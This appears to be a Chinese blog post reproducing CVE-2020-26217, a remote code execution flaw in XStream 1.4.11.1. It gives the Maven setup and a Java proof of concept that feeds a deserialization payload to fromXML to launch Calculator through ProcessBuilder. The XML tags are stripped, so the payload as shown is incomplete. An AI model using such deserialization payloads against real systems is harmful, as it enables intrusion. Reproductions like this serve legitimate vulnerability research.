[CVE-2020-26217] XStream 远程代码执行漏洞复现

image.png

0x01 环境搭建

通过maven安装XStream:

    
        
        
            com.thoughtworks.xstream
            xstream
            1.4.11.1
        
    

0x02 漏洞复现

PoC:

import com.thoughtworks.xstream.XStream;


public class xstreamdemo {
    public static void main (String[] args){
        XStream xstream = new XStream();
        String xml = "\n" +
                "  \n" +
                "    \n" +
                "      0\n" +
                "      \n" +
                "        \n" +
                "          \n" +
                "            text/plain\n" +
                "            \n" +
                "              \n" +
                "                \n" +
                "                  \n" +
                "                    0\n" +
                "                    -1\n" +
                "                    1\n" +
                "                    \n" +
                "                      \n" +
                "                        \n" +
                "                          open\n" +
                "                          -a\n" +
                "                          Calculator\n" +
                "                        \n" +
                "                      \n" +
                "                    \n" +
                "                  \n" +
                "                  \n" +
                "                    \n" +
                "                      java.lang.ProcessBuilder\n" +
                "                      start\n" +
                "                      \n" +
                "                    \n" +
                "                    start\n" +
                "                  \n" +
                "                  \n" +
                "                \n" +
                "                KEYS\n" +
                "              \n" +
                "              \n" +
                "                \n" +
                "                0\n" +
                "                0\n" +
                "                0\n" +
                "              \n" +
                "            \n" +
                "            false\n" +
                "          \n" +
                "          \n" +
                "        \n" +
                "        0\n" +
                "      \n" +
                "    \n" +
                "    test\n" +
                "  \n" +
                "";
        xstream.fromXML(xml);
    }
}
image.png

0x03 参考

https://x-stream.github.io/CVE-2017-7957.html
https://xz.aliyun.com/t/8526

你可能感兴趣的:([CVE-2020-26217] XStream 远程代码执行漏洞复现)